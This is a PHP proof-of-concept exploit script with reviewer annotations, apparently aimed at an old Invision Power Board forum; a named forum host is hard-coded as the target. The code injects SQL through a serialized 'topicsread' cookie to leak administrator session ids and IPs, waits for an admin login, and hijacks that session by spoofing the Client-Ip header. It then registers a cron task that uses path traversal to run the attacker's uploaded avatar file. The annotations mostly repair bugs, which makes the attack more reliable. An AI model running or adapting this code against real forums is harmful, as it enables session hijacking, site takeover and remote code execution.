You will need the PHP cURL extension (php-curl) installed. (Note: the listing below actually talks to the server over raw sockets with fsockopen(), not cURL.)
<?php
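/*
 * Proof-of-concept exploit listing (as posted; reformatted and annotated on review --
 * the original paste had string literals and regexes hard-wrapped across lines).
 *
 * What the code below does, step by step:
 *  1. Authenticates as an ordinary member with the member_id / pass_hash cookie pair
 *     ($forum_member_id and $forum_pass_hash are placeholders to fill in).
 *  2. Sends a serialized PHP array in the "topicsread" cookie whose array KEY is a
 *     SQL UNION payload selecting session_id and session_ip_address from
 *     ibf_admin_sessions. The target evidently unserializes that cookie and places
 *     the keys into a query unquoted; the selected values come back rendered in the
 *     UserCP page and are scraped with a regex.
 *  3. Polls that page every $interval seconds until a *different* admin session id
 *     shows up (i.e. an administrator has logged in since the first read).
 *  4. POSTs to admin.php with adsess=<that session id> and a Client-Ip header set to
 *     the recorded session IP, adding a scheduled task whose task_file points at
 *     ../../uploads/av-<member_id>.jpg -- presumably the attacker's own avatar upload.
 *     This script does not upload anything itself; the file is assumed to exist.
 *  5. Scrapes the new task's cron key (ck=...) out of the response.
 *
 * Reviewer notes -- assumptions this relies on that the listing cannot confirm:
 *  - that the target binds admin sessions to an IP address but takes that address
 *    from a client-supplied Client-Ip header (otherwise step 4 fails);
 *  - that "ibf_" is the table prefix in use and the UNION's column count matches the
 *    target's query -- both are install/version specific.
 * The ibf_ prefix and the adsess/UserCP URL shapes suggest an old Invision Power
 * Board install, but the listing itself names no product or version.
 */
$server = "pzforum.net";
$port = 80;
// wait between checking sessions (90 minutes)
$interval = 60 * 90;
$forum_root = "/";
// $forum_root as it must appear inside a /.../-delimited regex. The original
// hard-coded "\/"; preg_quote yields the same string for "/" and stays correct
// if $forum_root is ever changed to a longer path.
$forum_root2 = preg_quote($forum_root, '/');
$forum_cookie_header = "paz";                 // cookie-name prefix used by the target forum
$forum_member_id = xxx;                       // placeholder: the attacker's own numeric member id
$forum_pass_hash = "xxxxxxxxxxxxxxxxxxxxxxxx"; // placeholder: that account's pass_hash cookie value
// Login cookies for the attacker's own (unprivileged) account.
$forum_validate_cookie = $forum_cookie_header . "member_id=" . $forum_member_id . ";"
    . $forum_cookie_header . "pass_hash=" . $forum_pass_hash . ";";

// SQL injection payload, carried as the KEY of a serialized array in the
// "topicsread" cookie. From its shape, the leading "1)" is meant to close an open
// parenthesis in the target's query and the trailing "where (1,1)=(1" to re-open one
// so the remainder of that query still parses -- the target query itself is not
// visible here, so treat that reading as inferred.
$injection_array = array(
    1 => 1,
    "1) UNION SELECT 1,session_id,session_ip_address,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ibf_admin_sessions where (1,1)=(1" => 2,
);
$tmpcookie = $forum_validate_cookie . $forum_cookie_header . "topicsread="
    . urlencode(serialize($injection_array)) . ";";

// The injected columns are rendered into the UserCP page: capture group 1 is the
// session_id, group 2 the session_ip_address.
$session_pattern = '/<a id="tid-link-1"[^>]*>(.*)<\/a><\/span>[^<]*<div class="desc"><span[^>]*>(.*)<\/span>/';
$usercp_url = $forum_root . "index.php?act=UserCP&CODE=00";

// get initial session_id
echo "*** ATTEMPTING TO GET OLD SESSION INFO ***\r\n";
$tmppage = getPage($server, $port, $usercp_url, "", $tmpcookie);
if (preg_match($session_pattern, $tmppage, $tmpmatches)) {
    $session_id = $tmpmatches[1];
    $ip_address = $tmpmatches[2];
    echo "old session: ip - " . $ip_address . " , " . "session_id - " . $session_id . "\r\n";

    // wait for a new session
    $new_session = false;
    echo "*** WAITING FOR A NEW SESSION ***\r\n";
    while (!$new_session) {
        sleep($interval);
        $tmppage = getPage($server, $port, $usercp_url, "", $tmpcookie);
        if (!preg_match($session_pattern, $tmppage, $tmpmatches)) {
            // The original did not check the match result and would have treated an
            // empty/undefined capture as a "new session"; keep polling instead.
            echo "?";
            continue;
        }
        if ($tmpmatches[1] == $session_id) {
            echo ".";
        } else {
            $session_id = $tmpmatches[1];
            $ip_address = $tmpmatches[2];
            echo "found new session!\r\n";
            echo "new session: ip - " . $ip_address . " , " . "session_id - " . $session_id . "\r\n";
            $new_session = true;
        }
    }

    // spoof new session to add our task
    echo "*** ATTEMPTING TO SPOOF SESSION AND ADD AVATAR TASK ***\r\n";
    $tmppvar  = "task_title=Weekly Clean Out&";
    $tmppvar .= "task_description=Rebuilds forum indexes&";
    // "../../" steps out of the tasks directory; the target evidently does not
    // confine task_file to it.
    $tmppvar .= "task_file=../../uploads/av-" . $forum_member_id . ".jpg&";
    $tmppvar .= "task_minute=0&";
    $tmppvar .= "task_hour=0&";
    $tmppvar .= "task_week_day=6&";
    $tmppvar .= "task_month_day=-1&";
    $tmppvar .= "task_log=0&";
    $tmppvar .= "task_enabled=1";
    // The posted copy showed "&section" as "§ion" (it appears the "&sect" part was
    // rendered as an HTML entity); the cron-key regex below confirms the parameter
    // is "section". No Cookie header is sent here: the admin request is authenticated
    // only by adsess= and by the Client-Ip header carrying the recorded session IP.
    $tmppage = getPagePut(
        $server,
        $port,
        $forum_root . "admin.php?adsess=" . $session_id
            . "&section=tools&act=task&do=task_add_do&task_id=&type=add",
        $ip_address,
        "",
        $tmppvar
    );

    // retrieve cron key of our task
    if (preg_match("/Task Saved Successfully/", $tmppage)) {
        echo "task added successfully.\r\n";
        // $server is quoted so the dots in the hostname match literally (the
        // original interpolated it raw).
        $cron_pattern = '/<strong> Weekly Clean Out<\/strong>[^<]*<div[^>]*><em>Rebuilds forum indexes<\/em><\/div>[^<]*<div[^>]*>[^h]*http:\/\/'
            . preg_quote($server, '/') . $forum_root2
            . 'index.php\?section=tools&act=task&ck=(.{32})[^<]*<\/div>/';
        if (preg_match($cron_pattern, $tmppage, $tmpmatches)) {
            echo "cron key: " . $tmpmatches[1];
        } else {
            // The original echoed $tmpmatches[1] unconditionally (undefined on a miss).
            echo "task saved but cron key not found in response\r\n";
        }
    } else {
        echo "Error adding task?\r\n";
    }
} else {
    echo "failed to validate?\r\n";
}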
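/**
 * Issue a raw HTTP/1.1 GET over a plain TCP socket and return the whole response
 * (status line, headers and body) as one string.
 *
 * @param string $server hostname; resolved with gethostbyname() and sent as Host
 * @param int    $port   TCP port
 * @param string $file   request target (path + query), sent verbatim -- the caller
 *                       is responsible for any URL encoding
 * @param string $sip    value for a Client-Ip request header; header omitted when ""
 *                       (the caller passes a recorded session IP here; whether the
 *                       target honours that header is a property of the target)
 * @param string $cookie value for the Cookie header; header omitted when ""
 * @return string the raw response, or "Unknown" if the connection could not be opened
 */
function getPage($server, $port, $file, $sip, $cookie) {
    $ip = gethostbyname($server);
    // 30s connect timeout; without one a filtered port blocks for the OS default.
    $fp = fsockopen($ip, $port, $errno, $errstr, 30);
    if (!$fp) {
        // Same sentinel as the original so callers' string checks are unaffected.
        return "Unknown";
    }
    // Every header line must end in CRLF. The original terminated the Client-Ip and
    // Cookie lines with a bare "\n", which lenient servers accept but is not HTTP.
    $com  = "GET $file HTTP/1.1\r\n";
    $com .= "Host: $server:$port\r\n";
    if ($sip != "")    { $com .= "Client-Ip: $sip\r\n"; }
    if ($cookie != "") { $com .= "Cookie: $cookie\r\n"; }
    $com .= "Connection: close\r\n";
    $com .= "\r\n";
    fwrite($fp, $com);

    // Read until the server closes the connection. The original looped until the
    // buffer happened to end in "\r\n\r\n"; once EOF is reached fread() returns ""
    // forever, so a response not ending in a blank line spun indefinitely.
    $response = "";
    while (!feof($fp)) {
        $chunk = fread($fp, 8192);
        if ($chunk === false || $chunk === "") {
            break;
        }
        $response .= $chunk;
    }
    fclose($fp); // the original never closed the socket
    return $response;
}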
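/**
 * Issue a raw HTTP/1.1 POST (application/x-www-form-urlencoded) over a plain TCP
 * socket and return the whole response (status line, headers and body) as one string.
 *
 * @param string $server hostname; resolved with gethostbyname() and sent as Host
 * @param int    $port   TCP port
 * @param string $file   request target (path + query), sent verbatim
 * @param string $sip    value for a Client-Ip request header; header omitted when ""
 * @param string $cookie value for the Cookie header; header omitted when ""
 * @param string $pvar   already-encoded form body, sent as-is
 * @return string the raw response, or "Unknown" if the connection could not be opened
 */
function getPagePut($server, $port, $file, $sip, $cookie, $pvar) {
    $ip = gethostbyname($server);
    $fp = fsockopen($ip, $port, $errno, $errstr, 30);
    if (!$fp) {
        // Same sentinel as the original so callers' string checks are unaffected.
        return "Unknown";
    }
    $com  = "POST $file HTTP/1.1\r\n";
    $com .= "Host: $server:$port\r\n";
    // CRLF on every header line (the original used bare "\n" for these two).
    if ($sip != "")    { $com .= "Client-Ip: $sip\r\n"; }
    if ($cookie != "") { $com .= "Cookie: $cookie\r\n"; }
    // The original requested keep-alive; combined with its read loop that meant the
    // call only returned if the response body happened to end in a blank line.
    // Asking the server to close lets us read to EOF instead.
    $com .= "Connection: close\r\n";
    $com .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $com .= "Content-Length: " . strlen($pvar) . "\r\n";
    $com .= "\r\n";
    // Send exactly Content-Length bytes. The original appended an extra "\r\n" after
    // the body that was not counted in the declared length.
    $com .= $pvar;
    fwrite($fp, $com);

    $response = "";
    while (!feof($fp)) {
        $chunk = fread($fp, 8192);
        if ($chunk === false || $chunk === "") {
            break;
        }
        $response .= $chunk;
    }
    fclose($fp); // the original never closed the socket
    return $response;
}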
?> |